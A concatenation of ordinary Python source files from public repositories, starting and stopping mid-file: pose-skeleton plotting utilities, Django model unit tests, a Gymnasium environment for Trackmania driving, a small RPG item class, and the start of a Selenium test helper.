plt.cm.hsv(np.linspace(0, 1, 10)).tolist()\n\tn_pts = pts3d.shape[0]\n\n\t# Draw points:\n\tax.plot(*zip(*pts3d), marker='o', color='r', ls='', markersize=5)\n\n\tfor edge in body_edges:\n\t\tif edge[0] < n_pts and edge[1] < n_pts:\n\t\t\tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\tplt.show()\n\n\ndef draw_skeleton_2d(pts2d, canvas_shape=(1080,1920,3), draw_indices=None, name='canvas', show=True, background=(0,0,0)):\n\tbones = np.asarray([1,3,0,-1,2,7,5,9,6,-1,8,5,6,11,12,13,14])\n\t# body_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcanvas = np.zeros(canvas_shape, np.uint8)\n\tcanvas[:] = background\n\n\tfor i in range(len(pts2d)):\n\t\tx = int(round(pts2d[i][0]))\n\t\ty = int(round(pts2d[i][1]))\n\t\tcanvas = cv2.circle(canvas, (x,y), 5, (0,0,255), 5)\n\n\t\tif draw_indices is not None:\n\t\t\t\tfont = cv2.FONT_HERSHEY_SIMPLEX\n\t\t\t\tbottomLeftCornerOfText = (x,y)\n\t\t\t\tfontScale = 1\n\t\t\t\tfontColor = (255,255,255)\n\t\t\t\tlineType = 2\n\t\t\t\tcv2.putText(canvas,str(i), bottomLeftCornerOfText, font, fontScale,fontColor,lineType)\n\n\t\t# for edge in body_edges:\n\t\t# \tx2 = int(round(pts2d[parent_i][0]))\n\t\t# \ty2 = int(round(pts2d[parent_i][1]))\n\t\t# \tif x+y != 0 and x2+y2 != 0:\n\t\t# \t\tcanvas = cv2.line(canvas,(x,y),(x2,y2),(255,0,0),4)\n\t\t# \tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\t\tif bones is not None:\n\t\t\tparent_i = bones[i]\n\t\t\tif parent_i >= 0:\n\t\t\t\tx2 = int(round(pts2d[parent_i][0]))\n\t\t\t\ty2 = int(round(pts2d[parent_i][1]))\n\t\t\t\tif x+y != 0 and x2+y2 != 0:\n\t\t\t\t\tcanvas = cv2.line(canvas,(x,y),(x2,y2),(255,0,0),4)\n\n\tif show:\n\t\tcv2.imshow(name,canvas)\n\t\tcv2.waitKey()\n\n\treturn canvas\n\n\ndef draw_skeleton_3d_with_sphere(pts3d, sphere, elev = -90, azim=-90, axis_lim=[-0.5, 0.5]):\n\tplt.rcParams['image.interpolation'] = 'nearest'\n\tfig = plt.figure()\n\tax = fig.add_subplot(111, projection='3d')\n\tax.view_init(elev = elev, azim=azim)\n\tax.set_xlabel('X Label')\n\tax.set_ylabel('Y Label')\n\tax.set_zlabel('Z Label')\n\tax.axis('equal')\n\tax.set_xlim(axis_lim)\n\tax.set_ylim(axis_lim)\n\tax.set_zlim(axis_lim)\n\n\tbody_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 10)).tolist()\n\tn_pts = pts3d.shape[0]\n\n\t# Draw points:\n\tax.plot(*zip(*pts3d), marker='o', color='r', ls='', markersize=5)\n\n\tfor edge in body_edges:\n\t\tif edge[0] < n_pts and edge[1] < n_pts:\n\t\t\tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\t# Draw sphere:\n\tax.plot(*zip(*sphere), marker='o', color='g', ls='', markersize=3)\n\n\tplt.show()\n\n\ndef draw_skeleton_3d_dynamic_with_object(pts3d_list, save_dir=None, elev = -90, azim=-90, axis_lim=[-0.5, 0.5], object_type='sphere'):\n\tif save_dir is not None:\n\t\tif not os.path.exists(save_dir):\n\t\t\tos.makedirs(save_dir)\n\n\tplt.rcParams['image.interpolation'] = 'nearest'\n\tfig = plt.figure()\n\n\tax = fig.add_subplot(111, projection='3d')\n\tax.view_init(elev = elev, azim=azim)\n\tax.set_xlabel('X Label')\n\tax.set_ylabel('Y Label')\n\tax.set_zlabel('Z Label')\n\n\tbody_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcube_edges = np.array([[0,1],[1,2],[2,3],[3,0],[4,5],[5,6],[6,7],[7,4],[0,4],[1,5],[2,6],[3,7]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 20)).tolist()\n\tn_pts = pts3d_list[0][0].shape[0]\n\n\tfor i,(pts3d,object_pts) in enumerate(pts3d_list):\n\t\tax.clear()\n\t\tax.set_xlim(axis_lim)\n\t\tax.set_ylim(axis_lim)\n\t\tax.set_zlim(axis_lim)\n\n\t\t# Draw points:\n\t\tax.plot(*zip(*pts3d), marker='o', color='r', ls='', markersize=5)\n\n\t\t# Draw edges:\n\t\tfor edge in body_edges:\n\t\t\tif edge[0] < n_pts and edge[1] < n_pts:\n\t\t\t\tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\t\t# Draw object:\n\t\tax.plot(*zip(*object_pts), marker='o', color='g', ls='', markersize=3)\n\n\t\tif object_type == 'cube':\n\t\t\tfor j,edge in enumerate(cube_edges):\n\t\t\t\tax.plot(object_pts[edge,0], object_pts[edge,1], object_pts[edge,2], color=colors[j])\n\n\t\tif save_dir is None:\n\t\t\tplt.pause(0.000001)\n\t\telse:\n\t\t\tpath = os.path.join(save_dir, str(i).zfill(5) + '.jpeg')\n\t\t\tfig.savefig(path)#, bbox_inches='tight', pad_inches = 0)\n\n\t\tprint('{}/{} '.format(i+1, len(pts3d_list)), end='\\r')\n\t\t\n\n\tplt.show()\n\ndef draw_cube_2d(obj2d_pts, canvas):\n\tcube_edges = np.array([[0,1],[1,2],[2,3],[3,0],[4,5],[5,6],[6,7],[7,4],[0,4],[1,5],[2,6],[3,7]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 20)).tolist()\n\n\tfor pi in range(obj2d_pts.shape[0]):\n\t\tx = int(round(obj2d_pts[pi,0]))\n\t\ty = int(round(obj2d_pts[pi,1]))\n\t\tcv2.circle(canvas, (x,y), 5, (0,255,0), 5)\n\n\tfor j,edge in enumerate(cube_edges):\n\t\tpt1 = (int(round(obj2d_pts[cube_edges[j,0],0])), int(round(obj2d_pts[cube_edges[j,0],1])))\n\t\tpt2 = (int(round(obj2d_pts[cube_edges[j,1],0])), int(round(obj2d_pts[cube_edges[j,1],1])))\n\t\tcv2.line(canvas, pt1, pt2, color=colors[j], thickness=2)\n\n\treturn canvas\n\ndef generate_fibonacci_sphere(num_pts=100,randomize=True, axis_lim =[-2.0,2.0], draw=False):\n\t\n\t# Generate sphere points:\n\trnd = 1.\n\tif randomize:\n\t\trnd = random.random() * num_pts\n\n\tpoints = np.empty((num_pts,3), dtype=np.float32)\n\toffset = 2./num_pts\n\tincrement = math.pi * (3. - math.sqrt(5.));\n\n\tfor i in range(num_pts):\n\t\ty = ((i * offset) - 1) + (offset / 2);\n\t\tr = math.sqrt(1 - pow(y,2))\n\n\t\tphi = ((i + rnd) % num_pts) * increment\n\n\t\tx = math.cos(phi) * r\n\t\tz = math.sin(phi) * r\n\n\t\tpoints[i,:] = (x,y,z)\n\n\t# Draw:\n\tif draw:\n\t\tplt.rcParams['image.interpolation'] = 'nearest'\n\t\tfig = plt.figure()\n\t\tax = fig.add_subplot(111, projection='3d')\n\t\tax.view_init(elev = -90, azim=-90)\n\t\tax.set_xlim(axis_lim)\n\t\tax.set_ylim(axis_lim)\n\t\tax.set_zlim(axis_lim)\n\n\t\tax.axis('equal')\n\t\tax.plot(*zip(*points), marker='o', color='r', ls='')\n\t\tplt.show()\n\n\treturn points\n\n\ndef transform_sphere(points, offset=(0.0,0.0,0.0), scale=1.0):\n\tfor i in range(points.shape[0]):\n\t\tpoints[i] = points[i]*scale + offset\n\n\treturn points\n\ndef generate_cube():\n\t'''\n 4_______5 \n /. /|\n 0 /_.___1/ |\n\t| . | |\n\t| 7----|-/6\n |______|/\n 3 2\n\t'''\n\tpoints = np.empty((8,3), dtype=np.float32)\n\tstep = 0.5\n\tpoints[0,:] = (-step, step, step)\n\tpoints[1,:] = ( step, step, step)\n\tpoints[2,:] = ( step,-step, step)\n\tpoints[3,:] = (-step,-step, step)\n\tpoints[4,:] = (-step, step,-step)\n\tpoints[5,:] = ( step, step,-step)\n\tpoints[6,:] = ( step,-step,-step)\n\tpoints[7,:] = (-step,-step,-step)\n\n\treturn points\n\n\n","repo_name":"darkAlert/multi-view-pose-3d","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"10994786896","text":"\"\"\"\nItem Model Test\n===============\n\nThis module provides complete testing for all Item's model functions.\n\"\"\"\n\nimport datetime\nfrom unittest import mock\nfrom django.test import TestCase\nfrom authentication.models import CustomUser\nfrom curriculum.models import Curriculum\nfrom item.models import Item\nfrom team.models import Team\nfrom topic.models import Topic\n\n\nTEST_TIME = datetime.datetime(2016, 10, 15, 8, 15, 12)\n\n\nclass ItemModelTestCase(TestCase):\n \"\"\"TestCase for providing Item model testing\"\"\"\n\n def setUp(self):\n \"\"\"Method that provides preparation before testing Item model's features.\"\"\"\n\n with mock.patch('django.utils.timezone.now') as mock_time:\n mock_time.return_value = TEST_TIME\n\n custom_user_first = CustomUser(id=101,\n first_name='john',\n last_name='doe',\n middle_name='eric',\n email='email',\n password='123456')\n custom_user_first.save()\n custom_user_second = CustomUser(id=102,\n first_name='eric',\n last_name='moreno',\n middle_name='mike',\n email='test@email',\n password='123456')\n custom_user_second.save()\n\n custom_user_third = CustomUser(id=103,\n first_name='pablo',\n last_name='martines',\n middle_name='jo',\n email='sometest@email',\n password='123456')\n custom_user_third.save()\n\n team = Team(id=101,\n owner=custom_user_first,\n name='Coldplay')\n team.save()\n team.members.add(custom_user_first, custom_user_second)\n\n curriculum = Curriculum.objects.create(id=101,\n name=\"testcurriculum\",\n goals=[\"goal1\", \"goal2\"],\n description=\"test_descr\")\n curriculum.save()\n\n topic_python = Topic(id=101,\n curriculum=curriculum,\n title='Python',\n description='My awesome topic')\n topic_python.save()\n topic_python.mentors.add(custom_user_first, custom_user_third)\n\n topic_html = Topic(id=102,\n curriculum=curriculum,\n title='HTML',\n description='My another awesome topic')\n topic_html.save()\n topic_html.mentors.add(custom_user_third)\n\n item_first = Item(id=101,\n name='read documentation',\n form=0,\n topic=topic_python)\n item_first.save()\n item_first.authors.add(custom_user_first, custom_user_third)\n\n item_second = Item(id=102,\n name='pass test',\n form=1,\n topic=topic_python,\n estimation=datetime.timedelta(seconds=54000))\n item_second.save()\n item_second.authors.add(custom_user_first)\n\n item_third = Item(id=103,\n name='watch videos',\n form=0,\n topic=topic_html,\n description='test',\n estimation=datetime.timedelta(seconds=1104000))\n item_third.save()\n item_third.authors.add(custom_user_first, custom_user_third)\n item_third.superiors.add(item_first, item_second)\n\n def test_item_repr(self):\n \"\"\"Method that test `__repr__` magic method of Item instance object.\"\"\"\n\n item = Item.objects.get(id=103)\n actual_repr = item.__repr__()\n expected_repr = ('Item(id=103)')\n self.assertEqual(actual_repr, expected_repr)\n\n def test_item_str(self):\n \"\"\"Method that test `__str__` magic method of Item instance object.\"\"\"\n\n item = Item.objects.get(id=101)\n actual_repr = item.__str__()\n expected_repr = (\"'id': 101, 'name': 'read documentation', 'authors': [101, 103], \"\n \"'topic': 101, 'form': 0, 'superiors': [], 'description': '', \"\n \"'estimation': None, 'created_at': 1476508512, 'updated_at': 1476508512\")\n self.assertEqual(actual_repr, expected_repr)\n\n def test_item_to_dict(self):\n \"\"\"\n Method that tests `to_dict` method of certain Item instance.\n\n Function tests Item instance with all filled parameters.\n \"\"\"\n\n item = Item.objects.get(id=103)\n expected_item_dict = {'id': 103,\n 'name': 'watch videos',\n 'authors': [101, 103],\n 'topic': 102,\n 'form': 0,\n 'superiors': [101, 102],\n 'description': 'test',\n 'estimation': 1104000,\n 'created_at': 1476508512,\n 'updated_at': 1476508512}\n actual_item_dict = item.to_dict()\n actual_item_dict['authors'].sort()\n actual_item_dict['superiors'].sort()\n self.assertDictEqual(actual_item_dict, expected_item_dict)\n\n def test_item_success_get_by_id(self):\n \"\"\"Method that tests succeeded `get_by_id` method of Item class object.\"\"\"\n\n actual_item = Item.get_by_id(102)\n expected_item = Item.objects.get(id=102)\n self.assertEqual(actual_item, expected_item)\n\n def test_item_none_get_by_id(self):\n \"\"\"Method that tests unsucceeded `get_by_id` method of Item class object.\"\"\"\n\n actual_item = Item.get_by_id(123)\n self.assertIsNone(actual_item)\n\n def test_item_success_create(self):\n \"\"\"Method that tests succeeded `create` method of Item class object.\"\"\"\n\n user_first = CustomUser.objects.get(id=101)\n user_second = CustomUser.objects.get(id=102)\n users = [user_first, user_second]\n superior_first = Item.objects.get(id=102)\n superior_second = Item.objects.get(id=103)\n superiors = [superior_first, superior_second]\n topic = Topic.objects.get(id=101)\n time = datetime.timedelta(seconds=66000)\n item = Item.create(name='new', authors=users, topic=topic,\n form=1, superiors=superiors, estimation=time)\n self.assertIsInstance(item, Item)\n self.assertEqual(item.name, 'new')\n self.assertEqual(item.topic.id, 101)\n self.assertEqual(item.form, 1)\n self.assertListEqual(list(item.authors.all()), users)\n self.assertListEqual(list(item.superiors.all()), superiors)\n self.assertEqual(item.description, '')\n self.assertEqual(item.estimation, time)\n\n def test_item_none_create(self):\n \"\"\"Method that tests unsucceeded `create` method of Item class object.\"\"\"\n\n author = CustomUser.objects.get(id=101)\n topic = Topic.objects.get(id=101)\n item = Item.create(name='test', authors=[author], topic=topic, form='str')\n self.assertIsNone(item)\n\n def test_item_update(self):\n \"\"\"\n Method that tests `update` method of the certain Item instance.\n\n Test for updating all attributes.\n \"\"\"\n\n estimation = datetime.timedelta(seconds=104000)\n actual_item = Item.objects.get(id=101)\n superior_first = Item.objects.get(id=102)\n superior_second = Item.objects.get(id=103)\n superiors = [superior_first, superior_second]\n actual_item.update(name='listen book',\n form=2,\n description='updated description',\n estimation=estimation,\n superiors=superiors)\n expected_item = Item.objects.get(id=101)\n self.assertEqual(actual_item, expected_item)\n self.assertEqual(actual_item.name, 'listen book')\n self.assertEqual(actual_item.form, 2)\n self.assertEqual(actual_item.description, 'updated description')\n self.assertEqual(actual_item.estimation, estimation)\n #\n self.assertListEqual(list(actual_item.superiors.all()), superiors)\n\n\n def test_item_add_authors(self):\n \"\"\"\n Method that tests `update_authors` method of the certain Item instance.\n\n Test for adding authors.\n \"\"\"\n\n actual_item = Item.objects.get(id=101)\n user_first = CustomUser.objects.get(id=101)\n user_second = CustomUser.objects.get(id=102)\n users = [user_first, user_second]\n actual_item.update_authors(authors_add=users)\n expected_item = Item.objects.get(id=101)\n self.assertListEqual(list(actual_item.authors.all()), list(expected_item.authors.all()))\n\n def test_item_remove_authors(self):\n \"\"\"\n Method that tests `update_authors` method of the certain Item instance.\n\n Test for removing authors.\n \"\"\"\n\n actual_item = Item.objects.get(id=103)\n user_first = CustomUser.objects.get(id=101)\n user_second = CustomUser.objects.get(id=102)\n users = [user_first, user_second]\n actual_item.update_authors(authors_del=users)\n expected_item = Item.objects.get(id=103)\n self.assertListEqual(list(actual_item.authors.all()), list(expected_item.authors.all()))\n\n def test_item_add_superiors(self):\n \"\"\"\n Method that tests `update_superiors` method of the certain Item instance.\n\n Test for adding superiors.\n \"\"\"\n\n actual_item = Item.objects.get(id=101)\n superior_first = Item.objects.get(id=102)\n superior_second = Item.objects.get(id=103)\n superiors = [superior_first, superior_second]\n actual_item.update_superiors(superiors_add=superiors)\n expected_item = Item.objects.get(id=101)\n self.assertListEqual(list(actual_item.authors.all()), list(expected_item.authors.all()))\n\n def test_item_remove_superiors(self):\n \"\"\"\n Method that tests `update_superiors` method of the certain Item instance.\n\n Test for removing superiors.\n \"\"\"\n\n actual_item = Item.objects.get(id=103)\n superior_first = Item.objects.get(id=102)\n superior_second = Item.objects.get(id=103)\n superiors = [superior_first, superior_second]\n actual_item.update_superiors(superiors_del=superiors)\n expected_item = Item.objects.get(id=103)\n self.assertListEqual(list(actual_item.authors.all()), list(expected_item.authors.all()))\n\n def test_item_success_delete(self):\n \"\"\"Method that tests succeeded `delete_by_id` method of Item class object.\"\"\"\n\n is_item_delete = Item.delete_by_id(101)\n self.assertTrue(is_item_delete)\n self.assertRaises(Item.DoesNotExist, Item.objects.get, pk=101)\n\n def test_item_none_delete(self):\n \"\"\"Method that tests unsucceeded `delete_by_id` method of Item class object.\"\"\"\n\n is_item_delete = Item.delete_by_id(188)\n self.assertIsNone(is_item_delete)\n","repo_name":"lv275python/eventually.api","sub_path":"eventually/tests/unittests/item/testmodel.py","file_name":"testmodel.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"18828335898","text":"from gymnasium import Env, spaces\n\nimport numpy as np\nimport math\nimport time\n\nfrom stable_baselines3.common.env_checker import check_env\n\nfrom MapExtractor import get_map_data\n\nfrom Commands import (\n tm_accelerate,\n tm_brake,\n tm_steer,\n tm_reset,\n tm_respawn,\n tm_update\n)\n\nfrom GameDataGetter import GameDataGetter\nfrom TrackVisualizer import TrackVisualizer\n\n\nclass TrackmaniaEnv(Env):\n\n\n def __init__(self, map_path:str, obs_history:int=0, action_history:int=2, action_duration:float=0.05, obs_duration:float=0.0021, start_delay:float=1.9, human_driver:bool=False):\n \"\"\"Gym(nasium) compatible env for imitation/reinforcement learning in Trackmania.\n\n ### Parameters\n map_path : str\n Path to processed track file.\n obs_history : int, (default 0)\n Number of previous inputs to keep in the observation.\n action_history : int, (default 2)\n Number of previous actions to keep in the observation.\n The total number of previous actions will be equal to:\n obs_history + action_history.\n action_duration : float, (default 0.05)\n Desired amount of time between obtaining an observation and sending an action in seconds.\n If it takes less than action_duration, the thread will wait the rest of the time.\n If it takes more, the thread will print a timeout.\n obs_duration : float, (default 0.0021)\n Desired amount of time between sending an action and obtaining an observation in seconds.\n If it takes less than obs_duration, the thread will wait the rest of the time.\n If it takes more, the thread will print a timeout.\n start_delay : float, (default 1.9)\n The amount of time to wait after each restart (waiting for the countdown).\n If training, leave the default value.\n If validating, set to 0.0\n human_driver : bool, (default False)\n If True, env will not apply any action.\n \"\"\"\n\n super().__init__()\n wall_lasers=13\n\n # *** ACTION SPACE ***\n\n self.action_space = spaces.Box(\n # steer, gas/brake\n np.array([-1, -1], dtype=np.float32),\n np.array([1, 1], dtype=np.float32)\n )\n\n self.obs_history = obs_history\n self.action_history = action_history\n\n # *** OBSERVATION SPACE ***\n \n self.observation_space = spaces.Box(\n np.array(\n [-1, -1]*(self.obs_history+self.action_history) + \\\n [0]*(wall_lasers+2)*(self.obs_history+1),\n \n dtype=np.float32\n ),\n np.array(\n [1, 1]*(self.obs_history+self.action_history) + \\\n [1]*(wall_lasers+2)*(self.obs_history+1),\n \n dtype=np.float32\n )\n )\n\n # *** SETUP ***\n\n # flipping mechanism\n self.flip = True\n\n # respawning (true first time)\n self.done = False\n self.lap_time = None\n self.start_delay = start_delay\n \n # timestep equalizer\n self.action_duration = action_duration\n self.obs_duration = obs_duration\n\n # human driver mode\n self.human = human_driver\n\n # load map\n self.map = get_map_data(map_path)\n self.map_centerline = self.map.reshape((-1,2,2)).sum(axis=1)/2 # x, y\n self.next_checkpoint = 1\n self.location = np.array([0,0], dtype=np.float32)\n self.prev_projection = np.array([0,0], dtype=np.float32)\n self.direction = np.array([0,0], dtype=np.float32)\n self.prev_distance = 0.0\n\n # setup Trackmania bridge\n self.data_getter = GameDataGetter()\n\n # setup visualizer and lidar\n self.visualizer = TrackVisualizer(self.map)\n self.wall_number = wall_lasers\n\n # obs buffer\n self.obs_buffer = np.array(\n [0, 0]*(self.obs_history+self.action_history) + \\\n [0]*(wall_lasers+2)*(self.obs_history+1),\n\n dtype=np.float32\n )\n prev_action_range = 2*(self.obs_history+self.action_history)\n speed_range = self.obs_history + 1 + prev_action_range\n wall_contact_range = self.obs_history + 1 + speed_range\n\n self.view_buffer = self.obs_buffer[wall_contact_range:]\n self.wall_contact_buffer = self.obs_buffer[speed_range:wall_contact_range]\n self.speed_buffer = self.obs_buffer[prev_action_range:speed_range]\n self.prev_action_buffer = self.obs_buffer[:prev_action_range]\n\n # *** GAME MANIP ***\n\n def respawn(self):\n \"\"\"Respawns the car to the start.\n \"\"\"\n tm_reset()\n tm_update()\n tm_respawn()\n if self.start_delay > 0.0:\n time.sleep(self.start_delay)\n\n self.next_checkpoint = 1\n self.location[0] = self.data_getter.game_data[GameDataGetter.I_X]\n self.location[1] = self.data_getter.game_data[GameDataGetter.I_Z]\n self.prev_projection = self.location.copy()\n self.prev_distance = 0.0\n #self.threshold_speed = False\n self.flip = not self.flip\n for i in range(self.obs_history+self.action_history):\n self.refresh_observation()\n\n\n def refresh_observation(self):\n \"\"\"Obtains the observation and updates the buffer.\n \"\"\"\n # get info from the game\n self.location[0] = self.data_getter.game_data[GameDataGetter.I_X]\n self.location[1] = self.data_getter.game_data[GameDataGetter.I_Z]\n self.direction[0] = self.data_getter.game_data[GameDataGetter.I_DX]\n self.direction[1] = self.data_getter.game_data[GameDataGetter.I_DZ]\n\n # overwrite\n self.view_buffer[:-self.wall_number] = self.view_buffer[self.wall_number:]\n self.speed_buffer[:-1] = self.speed_buffer[1:]\n self.wall_contact_buffer[:-1] = self.wall_contact_buffer[1:]\n \n # add new\n view = self.visualizer.lidar(self.location, TrackmaniaEnv.vector_angle(self.direction), show=False)\n if self.flip:\n view = np.flip(view)\n self.view_buffer[-self.wall_number:] = view\n\n speed = self.data_getter.game_data[\n GameDataGetter.I_SPEED\n ]*0.0036\n self.speed_buffer[-1] = speed\n \n self.wall_contact_buffer[-1] = float((self.view_buffer[-self.wall_number:] < TrackVisualizer.CONTACT_THRESHOLD).any())\n\n\n def apply_action(self, action:np.ndarray):\n \"\"\"Applies the given action.\n\n ### Parameters\n action : np.ndarray\n Array of two floats [-1,1] indicating, respectively, steering and throttle/braking.\n \"\"\"\n # overwrite\n self.prev_action_buffer[:-2] = self.prev_action_buffer[2:]\n \n # add new\n self.prev_action_buffer[-2:] = action\n\n if self.flip:\n action[0] = -action[0]\n \n if not self.human:\n tm_reset()\n\n tm_steer(action[0])\n if action[1] > 0.0:\n tm_accelerate(action[1])\n elif self.data_getter.game_data[GameDataGetter.I_GEAR] > 0.1 and self.speed_buffer[-1] > 0.02:\n tm_brake(-action[1])\n \n tm_update()\n\n # *** UTILITIES ***\n\n def norm(x):\n return math.sqrt(x[0]**2 + x[1]**2)\n\n \n def cross_product(x, y):\n return x[0]*y[1] - x[1]*y[0]\n\n\n def vector_angle(r):\n n = TrackmaniaEnv.norm(r)\n if n == 0.0:\n return 0.0\n v = r[0]/n\n θ = math.acos(v)\n if r[1] < 0:\n θ *= -1\n return θ\n\n\n def vector_intersection(p, r, q, s):\n rxs = TrackmaniaEnv.cross_product(r, s)\n qmp = q - p\n qpxs = TrackmaniaEnv.cross_product(qmp, s)\n qpxr = TrackmaniaEnv.cross_product(qmp, r)\n if rxs == 0:\n return None\n t = qpxs/rxs\n u = qpxr/rxs\n if t >= 0 and t <= 1 and u >= 0 and u <= 1:\n return p + t*r\n return None\n\n \n def normal_projection(a, b, p):\n v = a - b\n v /= TrackmaniaEnv.norm(v)\n w = p - b\n return b + v*(w[0]*v[0] + w[1]*v[1])\n \n # *** ENV ESSENTIALS ***\n \n def calc_reward(self):\n # calc distance travelled between two steps\n centerline_distance = 0.0\n finish = False\n\n # negative direction vector\n v = -self.direction*100\n\n # checkpoints\n w = self.map[self.next_checkpoint][0:2] - self.map[self.next_checkpoint][2:4]\n while not TrackmaniaEnv.vector_intersection(\n self.location,\n v,\n self.map[self.next_checkpoint][2:4],\n w\n ) is None:\n centerline_distance += TrackmaniaEnv.norm(self.map_centerline[self.next_checkpoint] - self.prev_projection)\n self.prev_projection = self.map_centerline[self.next_checkpoint]\n self.next_checkpoint += 1\n if self.next_checkpoint >= len(self.map_centerline):\n self.next_checkpoint = 1\n self.done = True\n finish = True\n w = self.map[self.next_checkpoint][0:2] - self.map[self.next_checkpoint][2:4]\n\n projection = TrackmaniaEnv.normal_projection(\n self.map_centerline[self.next_checkpoint],\n self.map_centerline[self.next_checkpoint - 1],\n self.location\n )\n\n # check right orientation\n \n car_angle = TrackmaniaEnv.vector_angle(-v)\n centerline_angle = TrackmaniaEnv.vector_angle(self.map_centerline[self.next_checkpoint] - self.map_centerline[self.next_checkpoint-1])\n\n # delta angle between centerline and direction\n d_angle = car_angle - centerline_angle\n\n if d_angle > math.pi: d_angle -= 2*math.pi\n elif d_angle < -math.pi: d_angle += 2*math.pi\n\n if abs(d_angle) > math.pi/2:\n self.done = True\n \n if self.flip:\n d_angle = - d_angle\n\n centerline_distance += TrackmaniaEnv.norm(self.prev_projection - projection)\n self.prev_projection = projection\n\n # check wall contact\n penalty = 0.0\n if self.wall_contact_buffer[-1]:\n penalty = (self.speed_buffer[-1]**2) * 512.0\n\n # check stopped\n if time.time() - self.start_time > 5.0 and self.speed_buffer[-1] < 0.005:\n self.done = True\n \n if finish or bool(self.data_getter.game_data[GameDataGetter.I_FINISH]):\n self.lap_time = round(time.time() - self.start_time, 3)\n self.done = True\n\n return centerline_distance - penalty\n\n\n def reset(self, seed=None, options=None):\n self.done = False\n\n self.respawn()\n\n self.start_time = time.time()\n self.action_time = time.time()\n return self.obs_buffer, {}\n\n\n def step(self, action):\n self.lap_time = None\n\n # action\n self.action_time = time.time() - self.action_time\n if self.action_duration > self.action_time:\n time.sleep(self.action_duration - self.action_time)\n else:\n print(\"Action timeout: \", self.action_time - self.action_duration)\n\n self.apply_action(action)\n \n # observation\n obs_time = time.time()\n \n self.refresh_observation()\n reward = self.calc_reward()\n\n obs_time = time.time() - obs_time\n if self.obs_duration > obs_time:\n time.sleep(self.obs_duration - obs_time)\n else:\n print(\"Observation timeout: \", obs_time - self.obs_duration)\n\n # time next action\n self.action_time = time.time()\n \n return self.obs_buffer, reward, self.done, False, {}\n\n\nif __name__ == '__main__':\n env = TrackmaniaEnv('.\\\\Maps\\\\Nascar2.Map.txt', human_driver=False)\n #check_env(env)\n for i in range(2):\n gamma = 0.999\n total = 0\n env.reset()\n done = False\n while not done:\n obs, rew, done, _, __ = env.step([0,0])\n total += gamma*rew\n gamma*=0.999\n print(total)\n continue","repo_name":"AndrejGobeX/TrackMania_AI","sub_path":"TrackmaniaEnv.py","file_name":"TrackmaniaEnv.py","file_ext":"py","file_size_in_byte":10920,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"40"} +{"seq_id":"18451727745","text":"class Item:\n\n def __init__(self, new_name, new_damage, new_heal, new_add_armor, new_add_strenght, new_cost_stamina, new_price):\n self.name = new_name\n self.damage = new_damage\n self.heal = new_heal\n self.armor = new_add_armor\n self.strenght = new_add_strenght\n self.cost_stamina = new_cost_stamina\n self.price = new_price\n","repo_name":"Wizer21/Rpg","sub_path":"items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27903545861","text":"import os\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.common.exceptions import (\n ElementClickInterceptedException,\n JavascriptException,\n NoSuchElementException,\n StaleElementReferenceException,\n TimeoutException,\n)\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom seleniumrequests.request import RequestsSessionMixin\n\nfrom baselayer.app import models\nfrom baselayer.app.config import load_config\n\ncfg = load_config()\n\n\ndef set_server_url(server_url):\n \"\"\"Set web driver server URL using value loaded from test config file.\"\"\"\n MyCustomWebDriver.server_url = server_url\n\n\nclass MyCustomWebDriver(RequestsSessionMixin, webdriver.Firefox):\n @property\n def server_url(self):\n if not hasattr(self, \"_server_url\"):\n raise NotImplementedError(\n \"Please first set the web driver URL\" \" using `set_server_url`\"\n )\n return self._server_url\n\n @server_url.setter\n def server_url(self, value):\n self._server_url = value\n\n def get(self, uri):\n webdriver.Firefox.get(self, self.server_url + uri)\n try:\n self.find_element(By.ID, \"websocketStatus\")\n self.wait_for_xpath(\n \"//*[@id='websocketStatus' and contains(@title,'connected')]\"\n )\n except NoSuchElementException:\n pass\n\n def wait_for_xpath(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.presence_of_element_located((By.XPATH, xpath))\n )\n\n def wait_for_css(self, css, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.presence_of_element_located((By.CSS_SELECTOR, css))\n )\n\n def wait_for_xpath_to_appear(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until_not(\n expected_conditions.invisibility_of_element((By.XPATH, xpath))\n )\n\n def wait_for_xpath_to_disappear(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.invisibility_of_element((By.XPATH, xpath))\n )\n\n def wait_for_css_to_disappear(self, css, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.invisibility_of_element((By.CSS_SELECTOR, css))\n )\n\n def wait_for_xpath_to_be_clickable(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.element_to_be_clickable((By.XPATH, xpath))\n )\n\n def wait_for_xpath_to_be_unclickable(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until_not(\n 